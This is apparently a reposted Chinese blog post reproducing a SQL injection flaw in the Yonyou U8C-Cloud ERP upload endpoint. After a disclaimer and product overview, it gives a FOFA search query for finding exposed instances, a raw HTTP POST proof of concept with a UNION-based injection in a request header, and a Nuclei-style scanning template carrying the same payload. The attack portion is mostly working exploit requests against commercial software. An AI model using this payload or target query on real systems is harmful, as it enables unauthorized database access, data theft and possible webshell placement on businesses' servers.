请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
用友-U8C-Cloud是一款由用友软件开发的企业级管理软件,也被称为用友U8C。它是用友公司的核心产品之一,旨在帮助企业实现全面的信息化管理和运营。
用友-U8C-Cloud提供了一系列功能模块,涵盖了企业资源规划(ERP)、财务会计、人力资源管理、供应链管理、生产制造、销售与客户关系管理等方面。它可以帮助企业集中管理和控制各个业务流程,提高工作效率、降低成本,并提供决策支持和业务分析等功能。
用友-U8C-Cloud upload sql注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
fofa语法:app="用友-U8-Cloud"
POC:POST /u8cloud/api/hr/attachment/upload?mssql_error HTTP/1.1Host: x.x.x.xContent-Type: application/jsonsystem: 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(120)+CHAR(112)+CHAR(113)+ISNULL(CAST(111*111 AS VARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(120)+CHAR(113),NULL-- QIwqtrantype: pkisEncrypt: Nsign: tokenConnection: close
id: yonyou-u8cloud-upload-sqliinfo:name: yonyou-u8cloud-upload-sqliauthor: recjlseverity: highdescription: descriptionreference:https://tags: tagsrequests:raw:|+POST /u8cloud/api/hr/attachment/upload?mssql_error HTTP/1.1Host: {{Hostname}}: application/jsonsystem: 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(120)+CHAR(112)+CHAR(113)+ISNULL(CAST(111*111 AS VARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(120)+CHAR(113),NULL-- QIwqtrantype: pkisEncrypt: Nsign: tokenConnection: close: andmatchers:type: binarypart: bodybinary:a1e681af3ae59ctype: wordpart: bodywords:errorcodetype: statusstatus:- 200
原文始发于微信公众号(爱喝酒烫头的曹操):用友-U8C-Cloud upload sql注入漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论